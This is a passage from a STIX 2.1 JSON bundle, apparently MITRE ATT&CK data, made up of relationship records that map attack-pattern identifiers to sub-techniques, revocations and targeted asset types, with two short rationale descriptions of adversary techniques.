"attack-pattern--c2f59d25-87fe-44aa-8f83-e8e59d077bf5", "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4c53b294-973f-4cc2-a781-6c86b8f1c962", "created": "2023-09-28T21:23:14.975Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:23:14.975Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4c998857-39b2-4c8c-a11c-089c469f7b33", "created": "2020-02-11T18:48:48.762Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--1c2fd73a-e634-44ed-b1b5-9e7cf7404e9f", "target_ref": "attack-pattern--19bf235b-8620-4997-b5b4-94e0659ed7c3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4caab538-217d-4395-b241-34765482c338", "created": "2020-01-24T17:16:12.018Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462", "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4cfd348f-d2b0-4e89-b485-b2d02f912d1d", "created": "2020-01-23T22:02:48.682Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4d394e49-7904-4ba3-a776-17c238ed7774", "created": "2024-05-23T03:51:16.017Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T02:06:18.947Z", "description": "Asset Mapping Rationale: Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. An adversary may abuse protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.", "relationship_type": "targets", "source_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4d4db495-6366-414f-aa58-1dbd97032412", "created": "2022-04-16T20:45:01.832Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-05-24T14:00:00.188Z", "description": "", "relationship_type": "revoked-by", "source_ref": "attack-pattern--6636bc83-0611-45a6-b74f-1f3daf635b8e", "target_ref": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4d76274d-75bc-4cd0-be6a-3d5d99f73cb7", "created": "2023-09-28T20:27:04.841Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:27:04.841Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4d7a9d82-1400-42bd-982a-3e0e4d9396fa", "created": "2020-01-31T19:01:42.172Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5", "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4d7eecfc-4dd6-470c-a604-4c8239ac2be4", "created": "2023-09-28T21:28:11.821Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:28:11.821Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4ebeacbf-4f30-4f32-86dc-54d932ea7c46", "created": "2020-03-15T16:27:38.223Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", "target_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4f2ee424-4550-48ac-b995-2cdae87f45f9", "created": "2020-10-01T01:41:08.750Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--34b3f738-bd64-40e5-a112-29b0542bc8bf", "target_ref": "attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4f3a843b-18e7-46e8-8285-9102a2fe62e5", "created": "2023-09-29T18:02:38.399Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:02:38.399Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4f4e2e9e-6f9a-4c9c-af2b-4db4ec444c93", "created": "2023-09-29T17:57:55.162Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:57:55.162Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4f7cc4b9-fe3a-4883-97cc-4d2a44c55be9", "created": "2023-09-28T20:09:53.108Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:09:53.108Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4fabd2f2-9dbf-45f6-80fb-86d410de1e6c", "created": "2019-12-03T12:59:36.944Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--6636bc83-0611-45a6-b74f-1f3daf635b8e", "target_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": true, "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4fcc0674-fe6d-4977-9259-1832282a3997", "created": "2020-03-16T15:48:34.214Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4fd63ec9-e2ad-4473-b9ed-90d7dfe378e8", "created": "2020-01-24T14:33:05.871Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--9b99b83a-1aac-4e29-b975-b374950551a3", "target_ref": "attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4fd6854b-6caa-4cc2-b54a-a97530bf0fd7", "created": "2022-05-27T14:30:02.047Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-05-27T14:30:02.047Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a", "target_ref": "attack-pattern--81033c3b-16a4-46e4-8fed-9b030dd03c4a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4fd99e09-2473-4bc1-92fd-6bf17bed8ee5", "created": "2021-03-17T20:35:08.459Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--84ae8255-b4f4-4237-b5c5-e717405a9701", "target_ref": "attack-pattern--84771bc3-f6a0-403e-b144-01af70e5fda0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4fec497b-eda1-4a43-a192-b83eaf0d534d", "created": "2024-05-22T17:09:07.908Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T02:08:23.688Z", "description": "Asset Mapping Rationale: Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with Modify System Image to load a modified image on device startup or reset.", "relationship_type": "targets", "source_ref": "attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--503c5256-b611-437e-a4ef-2ee1fd20ab29", "created": "2023-09-29T18:03:06.209Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:03:06.209Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--505cb238-11ca-4409-b008-6aa808d2ec2d", "created": "2020-10-02T15:47:10.227Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea", "target_ref": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5071c70a-5aa8-4534-8cc4-676192728151", "created": "2020-02-11T18:25:28.308Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541", "target_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--508dfa9b-e98a-4fb7-a34b-b74a3a7446d9", "created": "2020-03-14T22:24:22.085Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", "target_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--50dea2f5-86ac-4786-b118-d67da0fa1a03", "created": "2020-01-24T17:57:51.455Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--6be14413-578e-46c1-8304-310762b3ecd5", "target_ref": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--51194570-630f-4d23-ab45-234a0f048b94", "created": "2019-12-03T14:25:00.678Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c", "target_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5131c799-517c-4bad-ba97-46ad7de956e7", "created": "2023-09-28T21:17:06.233Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:17:06.233Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5201c576-70a5-4b32-8dfd-dd8ac86f096c", "created": "2023-09-29T16:40:18.760Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:40:18.760Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5221fc94-cddd-416a-b027-67bc7a68ced1", "created": "2020-10-01T00:48:09.642Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--60c4b628-4807-4b0b-bbf5-fdac8643c337", "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--523777f8-4780-4716-807c-08a67450b916", "created": "2023-09-29T18:45:13.052Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:45:13.052Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--524ffb0f-40ae-4c97-a098-d14001fffa31", "created": "2023-09-29T16:44:54.473Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:44:54.473Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--525d0a51-bbf9-4cda-aec9-562bb05bd3a0", "created": "2024-04-09T20:58:49.397Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-04-09T20:58:49.397Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--529b0bf7-66f3-47f1-893b-4daa157f7760", "created": "2020-02-21T21:15:33.353Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--16e94db9-b5b1-4cd0-b851-f38fbd0a70f2", "target_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--52bfd00c-2e5b-4e43-bba6-f3b46e241d7b", "created": "2023-09-28T21:23:26.598Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:23:26.598Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--52cfec4e-9a4f-47b4-ba8a-fc95e034ac1e", "created": "2020-02-18T16:56:57.178Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--128c55d3-aeba-469f-bd3e-c8996ab4112a", "target_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--52e828db-58d0-443e-8d94-54d265d9606e", "created": "2023-09-29T17:42:01.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:42:01.044Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5366199a-400d-49de-96fb-ea393d5f770a", "created": "2020-03-02T20:08:03.768Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", "target_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--53accf9e-5c74-4c3a-bcec-8805f3517ec9", "created": "2020-07-07T09:45:06.463Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2020-07-13T14:49:39.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44", "target_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": true, "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": 